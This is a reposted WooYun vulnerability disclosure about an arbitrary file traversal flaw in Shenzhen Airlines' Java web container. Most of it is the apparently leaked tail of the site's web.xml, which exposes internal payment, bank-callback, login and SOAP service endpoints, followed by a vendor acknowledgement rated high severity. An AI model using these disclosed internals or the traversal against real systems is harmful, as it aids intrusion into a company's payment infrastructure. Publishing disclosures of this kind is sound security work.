<!-- add by yudx 20141204 neb-536 官网UIUIE快捷支付 end -->
<servlet-mapping id="ServletMapping_savePriceServlet">
<servlet-name>SavePriceServlet</servlet-name>
<url-pattern>/servlet/SavePrice</url-pattern>
</servlet-mapping>
<!-- add by yudx 20141204 neb-536 官网UIUIE快捷支付 start -->
<servlet-mapping id="ServletMapping_64552591">
<servlet-name>PaymentUiueNotifyServlet</servlet-name>
<url-pattern>/servlet/PaymentUiueNotifyServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_64552601">
<servlet-name>PaymentUiueReturnServlet</servlet-name>
<url-pattern>/servlet/PaymentUiueReturnServlet</url-pattern>
</servlet-mapping>
<!-- add by yudx 20141204 neb-536 官网UIUIE快捷支付 end -->
<servlet-mapping id="ServletMapping_interImage3D">
<servlet-name>InterCheckImageServlet3D</servlet-name>
<url-pattern>/servlet/InterCheckImageServlet3D</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_image3D">
<servlet-name>CheckImageServlet3D</servlet-name>
<url-pattern>/servlet/CheckImageServlet3D</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_image3DNew">
<servlet-name>CheckImageServlet3DNew</servlet-name>
<url-pattern>/servlet/CheckImageServlet3DNew</url-pattern>
</servlet-mapping>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 Start
-->
<servlet-mapping id="ServletMapping_1233884491919">
<servlet-name>RandomImgServlet</servlet-name>
<url-pattern>/servlet/RandomImgServlet</url-pattern>
</servlet-mapping>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C系统机票验真功能增加有效校验与查询限制 End
-->
<servlet-mapping id="ServletMapping_6455255">
<servlet-name>PaymentPlantServlet</servlet-name>
<url-pattern>/servlet/PaymentPlantServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_6455256">
<servlet-name>PaymentPlantNotifyServlet</servlet-name>
<url-pattern>/servlet/PaymentPlantNotifyServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_64552590">
<servlet-name>NewAPINotifyServlet</servlet-name>
<url-pattern>/servlet/NewAPINotifyServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_6455257">
<servlet-name>PaymentGuoNeiPlantServlet</servlet-name>
<url-pattern>/servlet/PaymentGuoNeiPlantServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_6455258">
<servlet-name>PaymentGuoNeiPlantNotifyServlet</servlet-name>
<url-pattern>/servlet/PaymentGuoNeiPlantNotifyServlet</url-pattern>
</servlet-mapping>
<!-- pujian payinterface -->
<!--
ADD By li-jun-neu 20140126 NEB-93 B2C 使用支付平台接口 Start
-->
<servlet-mapping id="ServletMapping_6455259">
<servlet-name>PaymentServlet</servlet-name>
<url-pattern>/servlet/PaymentServlet</url-pattern>
</servlet-mapping>
<!-- ADD By li-jun-neu 20140126 NEB-93B2C 使用支付平台接口 End -->
<servlet-mapping id="ServletMapping_image">
<servlet-name>CheckImageServlet</servlet-name>
<url-pattern>/servlet/CheckImageServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712510">
<servlet-name>TejiaMailBookServlet</servlet-name>
<url-pattern>/servlet/TejiaMailBookServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491878">
<servlet-name>BarcodeServlet</servlet-name>
<url-pattern>/gensvg</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_9082011072202">
<servlet-name>FindPasswordServlet</servlet-name>
<url-pattern>/servlet/findServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_9282011072202">
<servlet-name>ValidateUserServlet</servlet-name>
<url-pattern>/servlet/userServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491879">
<servlet-name>BarcodeServlet</servlet-name>
<url-pattern>/genbc</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1243957877209">
<servlet-name>GZUNIONB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.gzunion.GZUNIONB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712511">
<servlet-name>QuickMoneyB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.quickmpay.QuickMoneyB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712599">
<servlet-name>QuickMoneyCCServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.quickmpay.cc.QuickMoneyCCServlet
</url-pattern>
</servlet-mapping>
<!-- add by xingjg NEB-80-社会化值机 start -->
<servlet-mapping id="ServletMapping_1282032712580">
<servlet-name>PlatformLoginServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.b2c.checkin.platform.LoginServlet
</url-pattern>
</servlet-mapping>
<!-- add by xingjg NEB-80-社会化值机 end -->
<servlet-mapping id="ServletMapping_1337167924177">
<servlet-name>WyzxB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.wyzxen.WyzxB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712512">
<servlet-name>BOCOMB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.bocom.BOCOMB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491880">
<servlet-name>BarcodeErrorServlet</servlet-name>
<url-pattern>/errsvg</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491882">
<servlet-name>BankPayServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.BankPayServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491883">
<servlet-name>WapBankPayServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.WapBankPayServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491884">
<servlet-name>ABCB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.abc.ABCB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491913">
<servlet-name>EPosPayServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.yeepay.epos.EPosPayServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491885">
<servlet-name>AliPayB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.alipay.AliPayB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1243957877210">
<servlet-name>AliPayB2CServlet1</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.alipay.AliPayB2CServlet1
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491886">
<servlet-name>CCBB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.ccb.CCBB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491887">
<servlet-name>CCBWapB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.ccb.CCBWapB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491888">
<servlet-name>BCB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.bc.BCB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491889">
<servlet-name>CMBB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.cmb.CMBB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491890">
<servlet-name>CHINAPNRB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491891">
<servlet-name>CHINAPNRB2CServlet1</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet1
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491892">
<servlet-name>CHINAPNRMASB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRMASB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491893">
<servlet-name>CHINAPNRMASB2CRefundServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRMASB2CRefundServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491894">
<servlet-name>ICBCB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.icbc.ICBCB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491895">
<servlet-name>SDBB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.sdb.SDBB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491896">
<servlet-name>SZSHPDB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.spdb.SZSHPDB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491897">
<servlet-name>SZUnionServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.szunion.SZUNIONB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491898">
<servlet-name>YeePay2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.yeepay.YeePay2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491899">
<servlet-name>TenPayB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.tenpay.TenPayB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491900">
<servlet-name>AjaxServlet</servlet-name>
<url-pattern>/com.shenzhenair.shem.gift.checkCardServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491901">
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491902">
<servlet-name>SelectCityServlet</servlet-name>
<url-pattern>/servlet/SelectCityServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491903">
<servlet-name>CrmScoreServlet</servlet-name>
<url-pattern>/servlet/CrmScoreServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491904">
<servlet-name>ChineseWordServlet</servlet-name>
<url-pattern>/servlet/ChineseWordServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491905">
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/servlet/AxisServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491906">
<servlet-name>AxisServlet</servlet-name>
<url-pattern>*.jws</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491907">
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/services/*</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491908">
<servlet-name>SOAPMonitorService</servlet-name>
<url-pattern>/SOAPMonitor</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491909">
<servlet-name>Barbecue</servlet-name>
<url-pattern>/barbecue/barcode</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491910">
<servlet-name>dwr-invoker</servlet-name>
<url-pattern>/dwr/*</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491911">
<servlet-name>SearchEngineServlet</servlet-name>
<url-pattern>/servlet/SearchEngineServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491912">
<servlet-name>PSBCB2CServlet</servlet-name>
<url-pattern>/servlet/PSBCB2CServlet</url-pattern>
</servlet-mapping>
<session-config id="SessionConfig_1233884491878">
<session-timeout>45</session-timeout>
</session-config>
<mime-mapping id="MimeMapping_1154677298328">
<extension>abs</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1233884491878">
<extension>xsl</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298329">
<extension>ai</extension>
<mime-type>application/postscript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298330">
<extension>aif</extension>
<mime-type>audio/x-aiff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298331">
<extension>aifc</extension>
<mime-type>audio/x-aiff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298332">
<extension>aiff</extension>
<mime-type>audio/x-aiff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298333">
<extension>aim</extension>
<mime-type>application/x-aim</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298334">
<extension>art</extension>
<mime-type>image/x-jg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298335">
<extension>asf</extension>
<mime-type>video/x-ms-asf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298336">
<extension>asx</extension>
<mime-type>video/x-ms-asf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298337">
<extension>au</extension>
<mime-type>audio/basic</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298338">
<extension>avi</extension>
<mime-type>video/x-msvideo</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298339">
<extension>avx</extension>
<mime-type>video/x-rad-screenplay</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298340">
<extension>bcpio</extension>
<mime-type>application/x-bcpio</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298341">
<extension>bin</extension>
<mime-type>application/octet-stream</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298342">
<extension>bmp</extension>
<mime-type>image/bmp</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298343">
<extension>body</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298344">
<extension>cdf</extension>
<mime-type>application/x-cdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298345">
<extension>cer</extension>
<mime-type>application/x-x509-ca-cert</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298346">
<extension>title</extension>
<mime-type>application/java</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298347">
<extension>cpio</extension>
<mime-type>application/x-cpio</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298348">
<extension>csh</extension>
<mime-type>application/x-csh</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298349">
<extension>css</extension>
<mime-type>text/css</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298359">
<extension>dib</extension>
<mime-type>image/bmp</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298360">
<extension>doc</extension>
<mime-type>application/msword</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298361">
<extension>ppt</extension>
<mime-type>application/ppt</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298362">
<extension>mht</extension>
<mime-type>text/x-mht</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298363">
<extension>xls</extension>
<mime-type>application/msexcel</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298364">
<extension>dtd</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298365">
<extension>dv</extension>
<mime-type>video/x-dv</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298366">
<extension>dvi</extension>
<mime-type>application/x-dvi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298367">
<extension>eps</extension>
<mime-type>application/postscript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298368">
<extension>etx</extension>
<mime-type>text/x-setext</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298369">
<extension>exe</extension>
<mime-type>application/octet-stream</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298370">
<extension>gif</extension>
<mime-type>image/gif</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298371">
<extension>gtar</extension>
<mime-type>application/x-gtar</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298372">
<extension>gz</extension>
<mime-type>application/x-gzip</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298373">
<extension>hdf</extension>
<mime-type>application/x-hdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298374">
<extension>hqx</extension>
<mime-type>application/mac-binhex40</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298375">
<extension>htc</extension>
<mime-type>text/x-component</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298376">
<extension>htm</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298377">
<extension>html</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298378">
<extension>hqx</extension>
<mime-type>application/mac-binhex40</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298379">
<extension>ief</extension>
<mime-type>image/ief</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298380">
<extension>jad</extension>
<mime-type>text/vnd.sun.j2me.app-descriptor</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298381">
<extension>jar</extension>
<mime-type>application/java-archive</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298382">
<extension>java</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298383">
<extension>jnlp</extension>
<mime-type>application/x-java-jnlp-file</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298384">
<extension>jpe</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298385">
<extension>jpeg</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298386">
<extension>jpg</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298387">
<extension>js</extension>
<mime-type>text/javascript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298388">
<extension>jsf</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298389">
<extension>jspf</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298390">
<extension>kar</extension>
<mime-type>audio/x-midi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298391">
<extension>latex</extension>
<mime-type>application/x-latex</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298392">
<extension>m3u</extension>
<mime-type>audio/x-mpegurl</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298393">
<extension>mac</extension>
<mime-type>image/x-macpaint</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298394">
<extension>man</extension>
<mime-type>application/x-troff-man</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298395">
<extension>me</extension>
<mime-type>application/x-troff-me</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298396">
<extension>mid</extension>
<mime-type>audio/x-midi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298397">
<extension>midi</extension>
<mime-type>audio/x-midi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298398">
<extension>mif</extension>
<mime-type>application/x-mif</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298399">
<extension>mov</extension>
<mime-type>video/quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298400">
<extension>movie</extension>
<mime-type>video/x-sgi-movie</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298401">
<extension>mp1</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298402">
<extension>mp2</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298403">
<extension>mp3</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298404">
<extension>mpa</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298405">
<extension>mpe</extension>
<mime-type>video/mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298406">
<extension>mpeg</extension>
<mime-type>video/mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298407">
<extension>mpega</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298408">
<extension>mpg</extension>
<mime-type>video/mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298409">
<extension>mpv2</extension>
<mime-type>video/mpeg2</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298410">
<extension>ms</extension>
<mime-type>application/x-wais-source</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298411">
<extension>nc</extension>
<mime-type>application/x-netcdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298412">
<extension>oda</extension>
<mime-type>application/oda</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298413">
<extension>pbm</extension>
<mime-type>image/x-portable-bitmap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298414">
<extension>pct</extension>
<mime-type>image/pict</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298415">
<extension>pdf</extension>
<mime-type>application/pdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298416">
<extension>pgm</extension>
<mime-type>image/x-portable-graymap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298417">
<extension>pic</extension>
<mime-type>image/pict</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298418">
<extension>pict</extension>
<mime-type>image/pict</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298419">
<extension>pls</extension>
<mime-type>audio/x-scpls</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298420">
<extension>png</extension>
<mime-type>image/png</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298421">
<extension>pnm</extension>
<mime-type>image/x-portable-anymap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298422">
<extension>pnt</extension>
<mime-type>image/x-macpaint</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298423">
<extension>ppm</extension>
<mime-type>image/x-portable-pixmap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298424">
<extension>ps</extension>
<mime-type>application/postscript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298425">
<extension>psd</extension>
<mime-type>image/x-photoshop</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298426">
<extension>qt</extension>
<mime-type>video/quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298427">
<extension>qti</extension>
<mime-type>image/x-quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298428">
<extension>qtif</extension>
<mime-type>image/x-quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298429">
<extension>rar</extension>
<mime-type>application/x-rar-compressed</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298430">
<extension>ras</extension>
<mime-type>image/x-cmu-raster</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298431">
<extension>rgb</extension>
<mime-type>image/x-rgb</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298432">
<extension>rm</extension>
<mime-type>application/vnd.rn-realmedia</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298433">
<extension>roff</extension>
<mime-type>application/x-troff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298434">
<extension>rtf</extension>
<mime-type>application/rtf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298435">

 

修复方案:

# 补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-11 09:20

厂商回复:

感谢您对深航信息系统的关注和帮助,我们将尽快排查程序修补漏洞

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:深圳航空java容器字符集解析不当导致任意文件遍历 - https://www.15qq.cn/wooyun/460.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知